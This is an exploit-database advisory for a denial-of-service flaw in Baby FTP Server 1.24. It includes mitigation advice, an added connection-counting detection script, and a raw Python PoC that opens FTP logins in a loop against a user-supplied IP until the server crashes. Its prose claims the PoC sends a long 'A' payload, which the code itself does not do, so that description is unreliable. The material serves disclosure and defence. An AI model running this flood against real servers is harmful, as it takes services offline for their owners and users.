Vendor: Baby FTP Server
By: n30m1nd
CVSS: 7,5 HIGH
Denial of Service
CWE: 400
Product Name: Baby FTP Server
Affected Version From: 1.24
Affected Version To: 1.24
Patch Exists: Yes
Related CWE: N/A
CPE: a:pablosoftwaresolutions:baby_ftp_server:1.24
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 and Windows 10
2016

Baby FTP 1.24 – Denial of Service by n30m1nd

The FTP Server can't handle more than ~1505 connections at the same time. The exploit code creates a socket connection to the target IP and sends a USER and PASS command with a large string of 'A's as the payload. This causes the server to crash.

Mitigation:

Upgrade to the latest version of Baby FTP Server.
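
A defender-side check for the condition described above, added here as an example and not part of the original advisory or PoC (Python 3): it replays FTP control-connection open/close events and flags any source holding an unusual number of simultaneous connections, plus a warning as the total nears the ~1505 figure. The event tuple format, the per-source threshold of 20 and the 80% warning level are assumptions; the IP addresses are constructed documentation addresses.

```python
from collections import Counter

SERVER_LIMIT = 1505   # approximate concurrent-connection figure from the advisory
PER_SOURCE_MAX = 20   # assumed policy threshold; tune for your environment


def scan(events, per_source_max=PER_SOURCE_MAX, server_limit=SERVER_LIMIT):
    """Replay (timestamp, src_ip, action) events, action being "open" or "close".

    Returns alerts as (timestamp, kind, detail): one "per_source" alert per
    offending source and one "total" alert when the server nears its limit.
    """
    warn_at = server_limit * 4 // 5   # assumed: warn at 80% of the limit
    open_by_src = Counter()
    total = 0
    flagged = set()
    total_warned = False
    alerts = []
    for ts, src, action in events:
        if action == "open":
            open_by_src[src] += 1
            total += 1
        elif action == "close" and open_by_src[src] > 0:
            open_by_src[src] -= 1
            total -= 1
            continue   # a close can never cross a threshold upward
        else:
            continue   # unknown action, or close without a matching open
        if open_by_src[src] > per_source_max and src not in flagged:
            flagged.add(src)
            alerts.append((ts, "per_source", src))
        if total >= warn_at and not total_warned:
            total_warned = True
            alerts.append((ts, "total", total))
    return alerts


def sample_events():
    """Constructed sample: one ordinary client and one source holding sockets open."""
    events = [(0, "198.51.100.7", "open"), (1, "198.51.100.7", "open"),
              (2, "198.51.100.7", "close")]
    events += [(10 + n, "203.0.113.50", "open") for n in range(1300)]
    return events


if __name__ == "__main__":
    for alert in scan(sample_events()):
        print(alert)
```

The same per-source count can back a connection cap at a firewall or proxy in front of a server that cannot be upgraded immediately.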

Exploit-DB raw data:

#!/usr/bin/python

### Baby FTP 1.24 - Denial of Service by n30m1nd ### 

# Date: 2016-10-27
# PoC Author: n30m1nd
# Vendor Homepage: http://www.pablosoftwaresolutions.com/
# Software Link: http://www.pablosoftwaresolutions.com/download.php?id=1
# Version: 1.24
# Tested on: Win7 64bit and Win10 64 bit

# Credits
# =======
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better

# How to
# ======
# * Run this python script and write the IP to attack.

# Why?
# ====
# The FTP Server can't handle more than ~1505 connections at the same time

# Exploit code
# ============

import socket

ip = raw_input("[+] IP to attack: ")

sarr = []
i = 0
while True:
	try:
		sarr.append(socket.create_connection((ip,21)))
		print "[+] Connection %d" % i
		crash1 = "A"*500  # built here but never sent in the commands below

		sarr[i].send("USER anonymous\r\n" )
		sarr[i].recv(4096)

		sarr[i].send("PASS n30m1nd\r\n" )
		sarr[i].recv(4096)
		i+=1
	except socket.error:
		print "[*] Server crashed!!"
		raw_input()
		break